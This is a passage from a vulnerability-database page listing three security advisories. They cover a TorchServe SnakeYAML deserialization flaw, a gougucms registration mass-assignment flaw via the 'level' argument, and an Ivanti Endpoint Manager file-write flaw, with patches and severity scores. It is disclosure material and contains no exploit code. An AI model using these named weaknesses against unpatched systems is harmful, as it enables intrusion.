  "details": "## Impact\n\n**Use of Open Source Library potentially exposed to RCE**\n    **Issue**: Use of a version of the SnakeYAML `v1.31 `open source library with multiple issues that potentially exposes the user to unsafe deserialization of Java objects. This could allow third parties to execute arbitrary code on the target system. This issue is present in versions `0.3.0` to `0.8.1`.\n    **Mitigation**: A pull request to address this issue has been merged - https://github.com/pytorch/serve/pull/2523. TorchServe release `0.8.2` includes this fix.\n\n## Patches\n\n## TorchServe release 0.8.2 includes fixes to address the previously listed issue:\n\nhttps://github.com/pytorch/serve/releases/tag/v0.8.2\n\n**Tags for upgraded DLC release**\nUser can use the following new image tags to pull DLCs that ship with patched TorchServe version 0.8.2:\nx86 GPU\n\n* v1.9-pt-ec2-2.0.1-inf-gpu-py310\n* v1.8-pt-sagemaker-2.0.1-inf-gpu-py310\n\nx86 CPU\n\n* v1.8-pt-ec2-2.0.1-inf-cpu-py310\n* v1.7-pt-sagemaker-2.0.1-inf-cpu-py310\n\nGraviton\n\n* v1.7-pt-graviton-ec2-2.0.1-inf-cpu-py310\n* v1.5-pt-graviton-sagemaker-2.0.1-inf-cpu-py310\n\nNeuron\n\n* 1.13.1-neuron-py310-sdk2.13.2-ubuntu20.04\n* 1.13.1-neuronx-py310-sdk2.13.2-ubuntu20.04\n* 1.13.1-neuronx-py310-sdk2.13.2-ubuntu20.04\n\nThe full DLC image URI details can be found at: https://github.com/aws/deep-learning-containers/blob/master/available_images.md#available-deep-learning-containers-images\n\n## References\nhttps://github.com/pytorch/serve/pull/2523\nhttps://github.com/pytorch/serve/releases/tag/v0.8.2\nhttps://github.com/aws/deep-learning-containers/blob/master/available_images.md#available-deep-learning-containers-images\n\n## Credit\nWe would like to thank Oligo Security for responsibly disclosing this issue and working with us on its resolution.\nIf you have any questions or comments about this advisory, we ask that you contact AWS/Amazon Security via our [vulnerability reporting page](https://aws.amazon.com/security/vulnerability-reporting[)](https://aws.amazon.com/security/vulnerability-reporting)) or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.",
  "id": "GHSA-4mqg-h5jf-j9m7",
  "modified": "2023-10-02T20:38:07Z",
  "published": "2023-10-02T20:38:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pytorch/serve/security/advisories/GHSA-4mqg-h5jf-j9m7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pytorch/serve/pull/2523"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pytorch/serve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "TorchServe Pre-Auth Remote Code Execution"
}

GHSA-4Q9H-CRQ4-9XJQ

Vulnerability from github – Published: 2026-04-01 03:31 – Updated: 2026-04-01 03:31
VLAI
Details

A vulnerability has been found in gougucms 4.08.18. This affects the function reg_submit of the file gougucms-master\app\home\controller\Login.php of the component User Registration Handler. Such manipulation of the argument level leads to dynamically-determined object attributes. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-5248"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-01T01:16:41Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been found in gougucms 4.08.18. This affects the function reg_submit of the file gougucms-master\\app\\home\\controller\\Login.php of the component User Registration Handler. Such manipulation of the argument level leads to dynamically-determined object attributes. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-4q9h-crq4-9xjq",
  "modified": "2026-04-01T03:31:40Z",
  "published": "2026-04-01T03:31:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5248"
    },
    {
      "type": "WEB",
      "url": "https://thinhneee.github.io/posts/gougu-mass-assign"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/780589"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/354429"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/354429/cti"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-562R-F8R6-C7WJ

Vulnerability from github – Published: 2025-12-09 18:30 – Updated: 2025-12-09 18:30
VLAI
Details

Improper control of dynamically managed code resources in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote, unauthenticated attacker to write arbitrary files on the server, potentially leading to remote code execution. User interaction is required.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-13659"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-09T16:17:35Z",
    "severity": "HIGH"
  },
  "details": "Improper control of dynamically managed code resources in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote, unauthenticated attacker to write arbitrary files on the server, potentially leading to remote code execution. User interaction is required.",
  "id": "GHSA-562r-f8r6-c7wj",
  "modified": "2025-12-09T18:30:35Z",
  "published": "2025-12-09T18:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13659"
    },
    {
      "type": "WEB",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

Strategy: Input Validation

For any externally-influenced input, check the input against an allowlist of acceptable values.

Mitigation
Implementation Architecture and Design

Strategy: Refactoring

Refactor the code so that it does not need to be dynamically managed.

No CAPEC attack patterns related to this CWE.